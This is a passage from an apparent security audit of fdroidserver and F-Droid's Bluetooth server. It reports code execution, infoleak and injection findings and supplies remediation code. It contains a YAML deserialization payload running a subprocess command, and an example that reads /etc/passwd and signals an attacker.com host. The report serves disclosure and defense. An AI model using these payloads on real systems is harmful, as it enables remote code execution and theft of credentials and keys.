<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.3</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-003 — Code Injection in Fdroidserver Metadata Yaml Parsing</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-003</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Maliciously crafted metadata can be used to run arbitrary code on the fdroidserver host.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">It is possible to craft a malicious metadata file in yaml format, which when its contents are accessed can execute arbitrary code. The affected function is in <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">metadata.py:1023</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">def parse_yaml_metadata(mf, app):
    yamldata = yaml.load(mf, Loader=YamlLoader)
    if yamldata:
        app.update(yamldata)
    return app</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">A malicious file contains entries like:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">foo: !!python/object/apply:subprocess.check_output ['whoami']</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: arbitrary code execution on the fdroidserver host when malicious metadata is parsed.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Use <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">yaml.safe_load</span> instead.</div></div>
</div>
<a name="f25-infoleak-in-fdroidserver-checkupdates-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.4</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-004 — Infoleak in Fdroidserver Checkupdates.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-004</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Infoleak</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">Attacker-controlled URLs can be used to first run a regular expression over a local file and then, depending on whether it matches, fetch a second URL or not. This can be used to leak information from the fdroid host.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">The python module <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urllib.request</span> also supports <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span> and custom schemes. This allows an attacker to craft an apk whose update check tests for certain things on the local filesystem and, depending on the match, calls a second URL controlled by the attacker.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py:50</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;"> urlcode, codeex, urlver, verex = app.UpdateCheckData.split('|')</div></pre>
<div style="margin-bottom: 5pt; line-height: 6mm;">Suppose the field UpdateCheckData is constructed so that <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urlcode</span> is for example <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:///etc/passwd</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">codeex</span> becomes <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">'^a[^:]*:x:(1000)' /etc/passwd</span>, <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urlver</span> points to an attacker-controlled domain, for example <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">https://attacker.com/startswitha</span>, and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">verex</span> is something that matches in the result. Whether <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">codeex</span> matches then decides whether the attacker-controlled URL is retrieved, which in this example leaks information about the default username. With further such packages it is possible to recover the username, and possibly also the secret SSH key of this user.</div>
<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt showing the infoleaking side channel:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">
    vercode = "99999999"
    if len(urlcode) > 0:
        logging.debug("...requesting {0}".format(urlcode))
        req = urllib.request.Request(urlcode, None)
        resp = urllib.request.urlopen(req, None, 20)
        page = resp.read().decode('utf-8')
        m = re.search(codeex, page)
        if not m:
            raise FDroidException("No RE match for version code")
        vercode = m.group(1).strip()
    version = "??"
    if len(urlver) > 0:
        if urlver != '.':
            logging.debug("...requesting {0}".format(urlver))
            req = urllib.request.Request(urlver, None)
            resp = urllib.request.urlopen(req, None, 20)
            page = resp.read().decode('utf-8')
            m = re.search(verex, page)
            if not m:
                raise FDroidException("No RE match for version")
            version = m.group(1)
    return (version, vercode)</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: sensitive information (like cryptographic keys) can be leaked.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Restrict URLs to HTTP(S) schemes.</div>
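<div style="margin-bottom: 5pt; line-height: 6mm;">The following is an added example of the recommended check, written for this report and not taken from fdroidserver. It assumes the four-field <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urlcode|codeex|urlver|verex</span> layout quoted above and that the empty-string and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">.</span> values keep the meaning the excerpt gives them; the function names are hypothetical. The point it shows is that the scheme must be allow-listed before the URL reaches <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">urllib.request.urlopen</span>, and that a scheme check alone is not enough: <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">http:///etc/passwd</span> has an allowed scheme but no host.</div>

```python
"""Added example (not fdroidserver code): restrict UpdateCheckData URLs to http(s)."""
from urllib.parse import urlsplit

ALLOWED_SCHEMES = frozenset({"http", "https"})


def check_update_url(url: str) -> str:
    """Return the URL if it is an absolute http(s) URL, otherwise raise ValueError.

    urllib.request.urlopen() also handles file:, data: and any installed custom
    scheme handler, so the scheme has to be allow-listed before the URL reaches it.
    """
    url = url.strip()
    parts = urlsplit(url)
    # urlsplit() lower-cases the scheme, so 'FILE:///...' is rejected as well.
    if parts.scheme not in ALLOWED_SCHEMES:
        raise ValueError("URL scheme %r is not allowed: %s" % (parts.scheme, url))
    # 'http:///etc/passwd' parses with an empty host; treat that as invalid too.
    if not parts.netloc:
        raise ValueError("URL has no host: %s" % url)
    return url


def is_allowed_update_url(url: str) -> bool:
    """Boolean form of check_update_url() for callers that only need a verdict."""
    try:
        check_update_url(url)
        return True
    except ValueError:
        return False


def split_update_check_data(update_check_data: str):
    """Split 'urlcode|codeex|urlver|verex' (the layout in the excerpt) and validate both URLs.

    An empty urlcode or urlver is left alone because the quoted code treats it as
    'no request'; the '.' sentinel for urlver is passed through for the same reason
    (assumption: the caller gives it the meaning the original code does).
    """
    fields = update_check_data.split("|")
    if len(fields) != 4:
        raise ValueError("UpdateCheckData needs exactly four '|'-separated fields")
    urlcode, codeex, urlver, verex = fields
    if urlcode:
        urlcode = check_update_url(urlcode)
    if urlver and urlver != ".":
        urlver = check_update_url(urlver)
    return urlcode, codeex, urlver, verex
```

<div style="margin-bottom: 5pt; line-height: 6mm;">Validating at parse time, before any request is built, means a malicious metadata file fails the update check with an error rather than triggering a local file read; the regular expressions themselves are still attacker-controlled and should be bounded separately.</div>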
</div>
</div>
<a name="f26-code-injection-in-fdroidserver-checkupdates-py-through-eval--ed-user-supplied-data"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.5</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-005 — Code Injection in Fdroidserver Checkupdates Through Eval'ed User Supplied Data</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-005</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The value of VercodeOperation supplied in the metadata of the app by the adversary is <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">eval</span>-ed in the fdroidserver script <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">checkupdates.py:425</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">op = app.VercodeOperation.replace("%c", oldvercode)
vercode = str(eval(op))</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: arbitrary code can be executed.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Create a simple interpreter for the allowed rules, or do strict validation of the input.</div></div>
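<div style="margin-bottom: 5pt; line-height: 6mm;">As an added illustration of the "simple interpreter" option (example code written for this report, not fdroidserver's implementation), the block below parses a VercodeOperation with the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">ast</span> module and interprets only integer arithmetic on literals and the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">%c</span> placeholder. The allowed operator set, the 64-character limit and the function names are assumptions; the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">%c</span> placeholder and the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">str(eval(op))</span> pattern it replaces are from the excerpt.</div>

```python
"""Added example (not fdroidserver code): evaluate VercodeOperation without eval()."""
import ast
import operator

# The only binary operators a VercodeOperation may use (assumed allow-list).
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_MAX_LEN = 64  # bounds both parser work and the size of intermediate integers


def _evaluate(node, c: int) -> int:
    """Walk a parsed expression, accepting only integer arithmetic on literals and %c."""
    if isinstance(node, ast.Constant) and type(node.value) is int:
        return node.value
    if isinstance(node, ast.Name) and node.id == "c":
        return c  # the substituted %c placeholder
    if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
        return -_evaluate(node.operand, c)
    if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
        return _BIN_OPS[type(node.op)](_evaluate(node.left, c), _evaluate(node.right, c))
    # Names, calls, attribute access, subscripts, ** and everything else end here.
    raise ValueError("disallowed construct in VercodeOperation: " + type(node).__name__)


def safe_vercode_operation(op_template: str, oldvercode: str) -> str:
    """Apply an operation such as '%c*10+1' to `oldvercode` and return the new code.

    The excerpt does str(eval(op)) on attacker-controlled text. Here %c is replaced
    by the name `c`, the result is parsed into an AST, and only the allow-listed
    node types are interpreted; the version code itself is never spliced into source.
    """
    if len(op_template) > _MAX_LEN:
        raise ValueError("VercodeOperation too long")
    if not oldvercode.isdigit():
        raise ValueError("old version code must be a decimal integer")
    source = op_template.replace("%c", " c ").strip()
    try:
        tree = ast.parse(source, mode="eval")
        result = _evaluate(tree.body, int(oldvercode))
    except (SyntaxError, ZeroDivisionError) as exc:
        raise ValueError("invalid VercodeOperation: %s" % exc)
    if result < 0:
        raise ValueError("version code must not be negative")
    return str(result)


def is_safe_vercode_operation(op_template: str) -> bool:
    """Convenience check: does the operation parse under the allow-list rules?"""
    try:
        safe_vercode_operation(op_template, "1")
        return True
    except ValueError:
        return False
```

<div style="margin-bottom: 5pt; line-height: 6mm;">Because the evaluator rejects by node type rather than by pattern-matching the string, there is no blacklist to evade: a call, an attribute lookup or an exponent is simply not one of the node types the interpreter knows, and the operation fails closed with a <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">ValueError</span> that <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">fdroid lint</span> could report.</div>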
</div>
<a name="f27-code-injection-via-malicious-appid-in-fdroidserver-build-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.6</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-006 — Code Injection Via Malicious Appid in Fdroidserver Build.py</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-006</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">A maliciously crafted appid can be used to inject code in fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">build.py:1274</span>.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;"><span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">build.py</span> uses the appid as a parameter passed to the shell:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">subprocess.call("fdroid publish {0}".format(app.id))</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: Arbitrary Code Execution</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate appids.</div></div>
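<div style="margin-bottom: 5pt; line-height: 6mm;">An added example of that validation (written for this report, not fdroidserver's own code): the appid is matched against an allow-list pattern, and the publish command is built as an argument vector so that the shell never sees the string at all. The pattern (dot-separated segments that start with a letter and contain only ASCII letters, digits and underscores) is the rule assumed here for Android application ids; the function names are hypothetical.</div>

```python
"""Added example (not fdroidserver code): validate an appid before it reaches a command line."""
import re
import subprocess

# Android application id: two or more dot-separated segments, each starting with a
# letter and containing only ASCII letters, digits and underscores (assumed rule).
_APPID_RE = re.compile(r"[A-Za-z][A-Za-z0-9_]*(?:\.[A-Za-z][A-Za-z0-9_]*)+")


def is_valid_appid(appid) -> bool:
    """True when `appid` is a well-formed application id and nothing else.

    fullmatch() is used instead of match() so that trailing characters such as a
    newline, a ';' or a '$' can never ride along with an otherwise valid id.
    """
    return isinstance(appid, str) and _APPID_RE.fullmatch(appid) is not None


def publish_argv(appid: str) -> list:
    """Build the publish command as an argv list.

    Two independent defences: the appid is validated against the allow-list
    pattern, and the command is an argument vector rather than a shell string,
    so the shell never interprets it even if validation were to regress.
    """
    if not is_valid_appid(appid):
        raise ValueError("refusing to publish: invalid appid %r" % (appid,))
    return ["fdroid", "publish", appid]


def publish(appid: str, run=subprocess.call) -> int:
    """Run `fdroid publish APPID` without a shell; `run` is injectable for tests."""
    return run(publish_argv(appid))
```

<div style="margin-bottom: 5pt; line-height: 6mm;">The same validated appid can be reused wherever build.py interpolates <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">app.id</span> into paths or commands; rejecting it once at metadata load time is simpler than escaping it at every use.</div>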
</div>
<a name="f29-javascript-injection-into-htmlified-package-descriptions-in-fdroidserver-metadata-py"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.7</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-007 — Javascript Injection Into HTMLified Descriptions in Fdroidserver Metadata</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-007</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>Code Execution</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">The <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">linkify</span> function of <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">DescriptionFormatter</span> in fdroidserver <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">metadata.py</span> allows for injection of javascript into the description of packages.</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 5pt; line-height: 6mm;">Excerpt from <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">metadata.py:557</span>:</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">index = txt.find("]")
...
url = txt[1:index]
index2 = url.find(' ')
...
else:
    urltxt = url[index2 + 1:]
    url = url[:index2]
...
res_html += '<a href="' + url + '">' + html.escape(urltxt, quote=False) + '</a>'</div></pre>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Impact:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">High: an attacker can inject code into visitors' browsers.</div></div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Recommendation:</div><div style="margin-bottom: 8mm; line-height: 6mm;">
<div style="margin-bottom: 1.3cm; line-height: 6mm;">Validate the URL and disallow schemes like <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">javascript:</span> and <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">file:</span>, possibly using a whitelist.</div>
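<div style="margin-bottom: 5pt; line-height: 6mm;">An added example of a scheme-checked replacement for the quoted logic (written for this report, not fdroidserver's code). It assumes the <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">[url text]</span> bracket syntax visible in the excerpt, where the first space separates the URL from the link text and a missing space makes the URL double as the text; the function names are hypothetical. Besides the scheme whitelist it fixes a second gap in the excerpt: the URL lands inside a double-quoted attribute, so it needs <span style="color: #444444; font-family: Courier; font-size: 85%; background-color: #eeeeee;">html.escape(url, quote=True)</span>, not just escaping of the link text. The same attribute and body escaping applies wherever a user-supplied URI is reflected into HTML (compare OTF-008).</div>

```python
"""Added example (not fdroidserver code): scheme-checked replacement for the quoted linkify logic."""
import html
from urllib.parse import urlsplit

ALLOWED_LINK_SCHEMES = frozenset({"http", "https"})


def is_safe_link(url: str) -> bool:
    """True only for absolute http(s) URLs; javascript:, file:, data: and relative URLs fail."""
    parts = urlsplit(url.strip())
    return parts.scheme in ALLOWED_LINK_SCHEMES and bool(parts.netloc)


def render_link(url: str, text: str) -> str:
    """Return an anchor element, or escaped plain text when the URL is not allowed.

    The URL is escaped with quote=True because it sits inside a double-quoted
    attribute; the excerpt above escapes only the link text.
    """
    if not is_safe_link(url):
        return html.escape(text, quote=False)
    return '<a href="%s">%s</a>' % (html.escape(url.strip(), quote=True),
                                     html.escape(text, quote=False))


def linkify(txt: str) -> str:
    """Convert '[url optional text]' markup to HTML the way the quoted code does.

    Assumption: the bracket syntax is as in the excerpt; text outside brackets
    is escaped, and an unterminated '[' is treated as literal text.
    """
    out = []
    pos = 0
    while True:
        start = txt.find("[", pos)
        end = txt.find("]", start) if start != -1 else -1
        if start == -1 or end == -1:
            out.append(html.escape(txt[pos:], quote=False))
            break
        out.append(html.escape(txt[pos:start], quote=False))
        body = txt[start + 1:end]
        space = body.find(" ")
        if space == -1:
            url, text = body, body
        else:
            url, text = body[:space], body[space + 1:]
        out.append(render_link(url, text))
        pos = end + 1
    return "".join(out)
```

<div style="margin-bottom: 5pt; line-height: 6mm;">Rendering a rejected link as plain text, rather than raising, keeps a single bad description from breaking index generation while still denying it an executable href.</div>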
</div>
</div>
<a name="f33-bluetoothserver-java-request-uri-included-in-response"></a><div style="margin-bottom: 1.3cm;">
<div style="color: #444444; font-family: Helvetica; font-size: 13pt; margin-bottom: 0.5cm; padding-left: 2mm;"><table width="100%"><tr><td valign="top" width="45.36"><div style="line-height: 0.7cm;"><span>4.1.8</span></div></td><td width="11.34"> </td><td valign="top"><div style="line-height: 0.7cm;">OTF-008 — Unvalidated User Input Included in Response</div></td></tr></table></div><table style="background-color: #ededed; border-color: #e4e4e4; margin-bottom: 8mm; padding-left: -8pt; border-style: solid; border-left-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-top: 4px solid #CC4900;" valign="top"><tbody><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability ID: </span>OTF-008</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Vulnerability type: </span>html/JavaScript Injection</div></td></tr><tr><td style="margin-left: 0; margin-right: 0; padding-left: 4pt; padding-right: 4pt; padding-top: 3pt; padding-bottom: 3pt;" valign="top" colspan="2"><div style="margin-bottom: 5pt;"><span style="font-weight: bold;">Threat level: </span>High</div></td></tr></tbody></table>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">BluetoothServer.java: Request URI Included in Response</div>
</div>
<div style="color: black; font-family: Helvetica; font-size: 12pt; margin-bottom: 0.5cm;">Technical description:</div><div style="margin-bottom: 8mm; line-height: 6mm;"><div style="margin-bottom: 5pt; line-height: 6mm;">In file net/bluetooth/BluetoothServer.java, the server prepares the response by including the request URI verbatim, without any validation.</div>
<pre><div style="color: #444444; font-family: Courier; font-size: 8pt; background-color: #ededed; border-color: #e4e4e4; border-style: solid; border-width: 1pt; margin-bottom: 4mm; padding: 4pt;">Line 194:
private Response respond(Map<String, String> headers, String uri) {
...
...
Lines 222-226:
    if (f.isDirectory() && !uri.endsWith("/")) {
        uri += "/";
        Response res = createResponse(NanoHTTPD.Response.Status.REDIRECT, NanoHTTPD.MIME_HTML,
                "<html><body>Redirected: <a href=\"" + uri + "\">" + uri + "</a></body></html>");
        res.addHeader("Location", uri);</div></pre></div>
